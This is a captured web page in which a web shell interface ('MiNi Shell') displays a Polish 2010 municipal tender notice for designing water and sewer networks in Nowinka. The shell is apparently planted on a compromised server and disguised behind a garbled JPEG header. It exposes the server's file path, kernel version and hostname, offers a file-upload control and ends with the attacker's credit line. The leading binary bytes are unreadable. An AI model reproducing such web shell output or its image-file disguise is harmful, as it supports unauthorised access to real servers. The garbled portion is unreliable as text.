JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101013/331374-N-2010.html

<p class="kh_header"><b>Nowinka: Projekt budowy sieci wodociągowej i kanalizacji sanitarnej wraz z przyłączami w miejscowościach Nowinka, Podnowinka, Szczebra, Szczeberka, Gatne Drugie.</b><br>
<b>Numer ogłoszenia: 331374 - 2010; data zamieszczenia: 13.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Nowinka , 16-304 Nowinka, woj. podlaskie, tel. 087 6419520, 6419541, faks 087 6419660.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projekt budowy sieci wodociągowej i kanalizacji sanitarnej wraz z przyłączami w miejscowościach Nowinka, Podnowinka, Szczebra, Szczeberka, Gatne Drugie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo - kosztorysowej budowy sieci kanalizacji  sanitarnej  grawitacyjno-tłocznej o długości szacunkowej 25 km z przepompowniami ścieków wraz z przyłączami domowymi około 284 szt zlokalizowanych w miejscowościach Nowinka, Podnowinka, Szczebra, Szczeberka, Gatne Drugie. oraz sieci wodociągowej w miejscowości Podnowinka około 20 przyłączy, 1500 m. 
1	Sporządzenie bilansu zapotrzebowania na wodę dla istniejącej sieci wodociągowej związanego z przyłączeniem nowych użytkowników
2	Sporządzenie bilansu ilości ścieków z projektowanych sieci sanitarnych na potrzeby projektowanej oczyszczalni ścieków w Nowince.
3	Przygotowanie dokumentów, w szczególności terenowo-prawnych , niezbędnych do uzyskania prawomocnej decyzji o ustaleniu lokalizacji inwestycji celu publicznego, o której mowa w ustawie o planowaniu i zagospodarowaniu przestrzennym  Dz. U. z 2003r. Nr 80, poz.717,  oraz raportów o wpływie inwestycji na stan środowiska naturalnego w tym dotyczących obszarów Natura 2000.
4	Wykonawca zobowiązany jest do przygotowania wszelkich dokumentów niezbędnych do wystąpienia o warunki na włączenie projektowanych sieci do sieci istniejącej oraz do uzgadniania przyjętych w projekcie materiałów, wybranej technologii, oraz uzgodnienia branżowego opracowanego projektu przez administratora istniejących sieci
5	Przygotowanie  dokumentacji  zapewniającej ZAMAWIAJĄCEMU  dysponowanie  terenami  pod  obiekty  objęte  przedmiotem niniejszego  zamówienia  a  w  szczególności  uzyskanie  przez  Projektanta, zgód właścicieli  terenów, przez które przebiegać będą  obiekty  liniowe  na  czasowe  zajęcie  ich  nieruchomości  oraz  uzyskanie  przez Projektanta  pisemnych  zgód  właścicieli  nieruchomości  na  umieszczenie  obiektów budowlanych  w  gruncie  oraz  uzyskanie  zgód  na  wykupienie  terenu  w  przypadku projektowania pompowni. Zgody będą wymagały  formy pisemnej, umownej wg wzoru opracowanego przez Zamawiającego, który zostanie dostarczony Projektantowi.
6	Sporządzenie  inwentaryzacji  szaty  roślinnej  oraz  projektu  gospodarki  szatą  roślinną opracowane na podkładzie z naniesioną  lokalizacją obiektów budowlanych wchodzących w skład inwestycji.
7	Przygotowanie  dokumentów  do  złożenia  wniosku  o  pozwolenie  na  budowę  wraz  z uzupełnieniem ewentualnych wykazanych braków przez Urząd wydający decyzję o pozwoleniu na  budowę, w  tym  Raportu  o oddziaływaniu  przedsięwzięcia na środowisko i informacji o BIOZ.
8	Zamawiający  wymaga  a  Projektant  zobowiązuje  się  do  tego  aby  rozwiązania  projektowe uwzględniały  wszystkie  domostwa   podłączenie  bezpośrednio  do  domu  wybudowane  w granicach  administracyjnych  będących  przedmiotem  przetargu  oraz  te,  na  które  wydano ważne pozwolenia na budowę.
I    Zakres opracowań i dokumentów projektowych
   Wykonanie badań i pomiarów w zakresie 
Ustalenia  geotechnicznych  warunków  posadowienia  w  oparciu  o  wszystkie  obowiązujące  w tym zakresie przepisy prawne.
Wykonanie map sytuacyjno-wysokościowych dla celów projektowych w skali 1 : 1000 lub 1 : 500 z geodezyjną inwentaryzacją szaty roślinnej, 
Pozyskanie wypisów i wyrysów z mapy ewidencyjnej gruntów dla obszarów przeznaczonych pod inwestycję i obszarów na które ta inwestycja będzie oddziaływać Opracowanie projektu budowlanego wraz z uzyskaniem opinii, uzgodnień i  zatwierdzeń. 
Projekt zagospodarowania terenu z uzgodnieniami  w tym
Infrastruktura  techniczna  i  urządzenie  terenu  dla  ewentualnych  pompowni sieci zewnętrzne  na  terenie  i  poza  terenem,  dojazd,  ukształtowanie  terenu,  zieleń  mała architektura
Niezbędne przebudowy , przekładki, odtworzenia istniejących obiektów inżynieryjnych
Projekt architektoniczno - budowlany  z uzgodnieniami 
Geologia, hydrogeologia, 
Projekty sieci głównych, przyłączy domowych, i budowli inżynieryjnych 
Technologia  z założeniami do rozruchu urządzeń instalacji i obiektów dla  pompow
Instalacje wszystkie branże   
Projekty przewiertów, przecisków pod przeszkodami terenowymi  drogi, koleje, cieki wodne itp. wraz z uzyskaniem uzgodnień z ich zarządcami
Projekty odtworzenia dróg kolidujących z przebiegiem sieci wod -kan. Wraz z uzyskaniem zgód zarządców.
2.3	Informacje dotyczące bezpieczeństwa i ochrony zdrowia
2.4	Ewentualne  operaty wodno - prawne na przekroczenie cieków wodnych ,
2.5	Ewentualnie Raport o oddziaływaniu inwestycji na środowisko.
2.6	Założenia realizacyjne inwestycji
2.7	Założenia do instrukcji eksploatacji. 
3.	Opracowanie projektu wykonawczego obejmującego część opisową i rysunkową: 
3.1	Projekt zagospodarowania terenu, 
3.2	Projekt wykonawczy sieci głównych, przyłączy domowych, i budowli inżynieryjnych 
3.3	Projekty wykonawcze branżowe sporządzone oddzielnie dla każdej branży.
3.4	 Projekty  wykonawcze  instalacji  występujące  w  projektowanych  obiektach
3.5	Projekty wykonawcze sieci zapewniających media dla obiektów. Projekty przepompowni muszą zawierać opracowania dotyczące zasilania elektrycznego po uzyskaniu warunków przyłączenia do sieci dystrybucyjnej, oświetlenia, dróg dojazdowych i włączenia do systemu monitoringu.  
3.6	Projekty ogrodzenia dla pompowni, 
3.7	Projekty  niezbędnych  przebudów,  przekładek  i  odtworzeń  istniejących  obiektów uzbrojenia i urządzenia terenu
3.8	Projekty przewiertów, przecisków pod przeszkodami terenowymi-drogi, koleje, cieki wodne itp.  
3.9	Projekty odtworzenia dróg kolidujących z przebiegiem sieci wod -kan.  
3.10	Projekt rozruchu : urządzeń , instalacji i obiektów, 
3.11	Szczegółowe parametry techniczne obiektów,  instalacji  oraz  urządzeń  związanych z projektowanymi obiektami umożliwiające wykonawcom robót budowlanych ich dobranie. 
3.12	Inne  niezbędne  opracowania  i  badania  pozwalające  na  kompleksową  i  prawidłową realizację przedsięwzięcia,
3.13	 Schemat projektowanych sieci na mapie kartograficznej  kolor w skali 1:10 000 z naniesionymi granicami poszczególnych arkuszy map projektowych.
3.14	Kartę informacyjną przedsięwzięcia o której mowa w art. 3.1. pkt. 5 ustawy z dnia 3 
października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale 
społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko 
Dz. U. Nr 199, poz. 1227
3.15	Oświadczenie o kompletności dokumentacji.  
II.    Dokumentacja kosztorysowa. 
1.	Przedmiary robót, które winny być opracowane oddzielnie dla każdego projektu zawierające: 
1.1.	Opis robót w kolejności technologicznej ich wykonania, 
1.2.	Odniesienie do STWIORB
1.3.	Podstawy do ustalania cen jednostkowych nakładów rzeczowych z podaniem ilości jednostek przedmiarowych robót zgodnie z założeniami wyjściowymi do kosztorysowania uzgodnionymi z Zamawiającym. 
2.	Kosztorysy  inwestorskie  ,  które winny  być  opracowane  oddzielnie  dla  każdego projektu branżowego. Kosztorysy  inwestorskie winny  być  opracowane  zgodnie  z Rozporządzeniem Ministra Infrastruktury z dn. 18 maja .2004 r . Dz. U. z 2004 r. nr 130.poz.1389) oraz zgodnie z art.  33.  Ustawy  Prawo  Zamówień  publicznych   Dz.U.  z  2004  r.  nr  19.  Póz.  177   z późniejszymi zmianami. 
3.	Specyfikacje  Techniczne Wykonania  i Odbioru  Robót  Budowlanych STWIORB  opracowane  zgodnie  z  Rozporządzeniem  Ministra Infrastruktury z dnia 2 września 2004 r.  w sprawie szczegółowego zakresu  i  formy  dokumentacji  projektowej,  specyfikacji  technicznych  wykonania  i  odbioru robót budowlanych  oraz programu funkcjonalno-użytkowego .Dz.U. Nr 202 ,poz.2072 z dnia 16 września 2004 r.z późn.zm. i zawierające zbiory wymagań w zakresie sposobu wykonania robót  budowlanych  a w  szczególności wymagań  w  odniesieniu  do  właściwości materiałów, sposobu wykonania robót, oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac
4.	Założenia wyjściowe  do  kosztorysowania  zawierające  dane  techniczne,  technologiczne  i organizacyjne  nie  określone  w  dokumentacji  projektowej  i  Specyfikacjach Technicznych Wykonania  i Odbioru Robót Budowlanych a mające wpływ na wysokość wartości kosztorysowej robót budowlanych oraz inne opracowania wymienione w art. 20. Ustawy  Prawo Budowlane  z  dn.  7.lipca  1994  r.   Dz. U.  z  2003  r.  nr  207,  poz.2016  z późniejszymi  zmianami  a  także  te ,  które  pozwolą  na  kompleksową  i  prawidłową realizację przedsięwzięcia inwestycyjnego . 
III.	Inne zobowiązania 
1.	Wszystkie  dokumenty  wchodzące w skład opracowania PROJEKTANT  sporządzi:
1.1	Projekt budowlany i wykonawczy w 5  egzemplarzach plus jedna kopia na nośniku elektronicznym w formacie pdf  i  dwf.
1.2	Przedmiary i kosztorysy inwestorskie  w  2  egzemplarzach plus jedna kopia na nośniku elektronicznym w formacie pdf  i ath 
1.3	Specyfikacje Techniczne Wykonania  i Odbioru Robót Budowlanych w 2 egzemplarzach plus jedna kopia na nośniku elektronicznym w formacie pdf, doc.
1.4	mapy sytuacyjno  - wysokościowe w 4 egzemplarzach  z oryginalnymi pieczęciami
Projektant zobowiązany jest do opisywania proponowanych materiałów, wyrobów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania nazw. Sposób opisu urządzeń i materiałów przewidywanych do zastosowania spełniać musi wymogi dotyczące sposobu opisu przedmiotu zamówienia na roboty budowlane, wynikające z art. 29-31 ustawy Prawo zamówień publicznych. Wskazanie w dokumentacji na znak towarowy, patent lub pochodzenie może nastąpić tylko w wyjątkowej sytuacji, tj. gdy przedmiotu zamówienia nie można opisać za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu muszą towarzyszyć wyrazy lub równoważny. Należy wówczas określić parametry graniczne (brzegowe) na podstawie których można będzie stwierdzić równoważność zaoferowanych rozwiązań, technologii..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.22.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentują wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę polegającą na wykonaniu dokumentacji projektowej budowlano-wykonawczej na budowę sieci kanalizacji sanitarnej lub mieszanej sanitarno-wodociągowej o wartości minimum 150 000 zł., z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączyć dokument potwierdzający, że te usługi zostały wykonane należycie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca udokumentował dysponowanie:
-	co najmniej 1 osobą posiadającą uprawnienia projektowe o specjalności sieci sanitarne,
-	co najmniej 1 osobą posiadającą uprawnienia projektowe o specjalności instalacje elektryczne
-	co najmniej 1 osobą posiadającą uprawnienia projektowe o specjalności budowa dróg 
-	co najmniej 1 osobą posiadającą uprawnienia do sporządzania map geodezyjnych do celów projektowych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany postanowień zawartej umowy wymagają formy pisemnej pod rygorem nieważności.
2. Niedopuszczalna jest pod rygorem nieważności taka zmiana niniejszej umowy oraz wprowadzanie do niej takich postanowień, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że spełniony zostanie jeden            z następujących warunków:
1) gdy konieczność wprowadzenia takich zmian wyniknie w rezultacie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, przy zachowaniu należytej staranności, a w tym z powodu siły wyższej nie pozwalającej na realizację umowy; termin wykonania zamówienia może ulec zmianie o okres odpowiadający wstrzymaniu lub opóźnieniu prac z tego powodu - jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć zmiany terminu wykonania umowy,
2)  ponadprzeciętnego czasu trwania procedur administracyjnych, mającego wpływ na termin wykonania zobowiązania i nie wynikającego z przyczyn leżących po stronie Wykonawcy - jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć zmiany terminu wykonania umowy,
3) gdy wprowadzenie zmian będzie korzystne dla Zamawiającego,
4) gdy konieczność wprowadzenia zmian wynika z okoliczności, za które odpowiedzialność ponosi Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umwp-podlasie.pl/bip/gmina/nowinka/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Nowinka  16-304 Nowinka  33.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2010 godzina 10:00, miejsce: Urząd Gminy Nowinka  16-304 Nowinka  33 Sekretariat Wójta Gminy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com